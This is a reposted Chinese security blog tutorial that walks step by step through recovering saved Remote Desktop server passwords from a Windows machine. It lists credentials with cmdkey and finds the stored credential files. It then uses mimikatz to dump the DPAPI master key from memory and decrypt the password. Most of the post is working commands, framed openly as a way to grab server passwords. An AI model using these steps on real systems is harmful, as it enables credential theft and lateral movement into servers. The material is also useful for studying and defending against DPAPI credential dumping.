【奇技淫巧】破解远程终端凭据,获取服务器密码

admin 2021年8月2日22:28:21评论152 views字数 1067阅读3分33秒阅读模式

【奇技淫巧】破解远程终端凭据,获取服务器密码

测试环境:windows 10


道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的XX饥渴难耐了。
但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解带。

【奇技淫巧】破解远程终端凭据,获取服务器密码


0x01 凭据管理器中查看Windows凭据:

TERMSRV/1xx.xxx.xxx.xx2

【奇技淫巧】破解远程终端凭据,获取服务器密码


        可通过命令行获取,执行: cmdkey /list
        注意:该命令务必在Session会话下执行,system下执行无结果。

0x02 凭据存储在用户目录下: 

C:Users<username>AppDataLocalMicrosoftCredentials*


图中名为

"FF359429D6F19C64BA7D3E282558EEB5"的文件即为目标凭据:TERMSRV/1xx.xxx.xxx.xx2的存储文件


【奇技淫巧】破解远程终端凭据,获取服务器密码




0x03 执行:

mimikatz "dpapi::cred /in:C:UsersxxAppDataLocalMicrosoftCredentialsFF359429D6F19C64BA7D3E282558EEB5"


【奇技淫巧】破解远程终端凭据,获取服务器密码


        pbData是凭据的加密数据,guidMasterKey是凭据的GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}

0x04 执行:

mimikatz privilege::debug sekurlsa::dpapi


【奇技淫巧】破解远程终端凭据,获取服务器密码


        根据目标凭据GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

0x05 拿到了MasterKey,服务器密码便唾手可得。执行解密命令:

mimikatz "dpapi::cred /in:C:UsersxxAppDataLocalMicrosoftCredentialsFF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"


【奇技淫巧】破解远程终端凭据,获取服务器密码


        解密出来的CredentialBlob即为凭据TERMSRV/1xx.xxx.xxx.xx2的服务器密码。

【奇技淫巧】破解远程终端凭据,获取服务器密码

本文始发于微信公众号(T00ls):【奇技淫巧】破解远程终端凭据,获取服务器密码

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月2日22:28:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【奇技淫巧】破解远程终端凭据,获取服务器密码http://cn-sec.com/archives/350320.html

发表评论

匿名网友 填写信息